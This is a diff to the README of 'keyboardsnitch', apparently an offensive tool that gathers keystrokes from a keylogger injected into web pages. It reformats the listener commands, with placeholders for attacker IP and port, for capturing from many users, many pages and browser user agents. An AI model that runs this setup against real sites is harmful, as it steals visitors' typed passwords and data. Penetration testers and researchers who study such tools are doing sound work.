s0lst1c3/keyboardsnitch/README.md

 If you are targeting a page visited by multiple users, use this command:

-	python keyboardsnitch.py --lhost <your ip address or fqdn here> --lport <the port on which to listen for data from the keylogger> --clients
+	# substitute YOUR_IP with your ip address
+	# substitute LISTEN_PORT with the port you want keyboardsnitch to listen on
+	python keyboardsnitch.py --clients --lhost YOUR_IP --lport LISTEN_PORT

 If you are injecting the keylogger into multiple pages, use this command:

-	python keyboardsnitch.py --lhost <your ip address or fqdn here> --lport <the port on which to listen for data from the keylogger> --hosts
+	# substitute YOUR_IP with your ip address
+	# substitute LISTEN_PORT with the port you want keyboardsnitch to listen on
+	python keyboardsnitch.py --hosts --lhost YOUR_IP --lport LISTEN_PORT

 If you are injecting the keylogger into multiple pages and expect those pages to be visited by multiple users, use this command:

-	python keyboardsnitch.py --lhost <your ip address or fqdn here> --lport <the port on which to listen for data from the keylogger> --clients --hosts
+	# substitute YOUR_IP with your ip address
+	# substitute LISTEN_PORT with the port you want keyboardsnitch to listen on
+	python keyboardsnitch.py --clients --hosts --lhost YOUR_IP --lport LISTEN_PORT

 If you want information about users' web browsers, use the --user-agents flag along with whatever other flags you choose to include:

-	python keyboardsnitch.py --lhost <your ip address or fqdn here> --lport <the port on which to listen for data from the keylogger> --clients --hosts --user-agents
+	# substitute YOUR_IP with your ip address
+	# substitute LISTEN_PORT with the port you want keyboardsnitch to listen on
+	python keyboardsnitch.py --user-agents --lhost YOUR_IP --lport LISTEN_PORT

 #Interactive Mode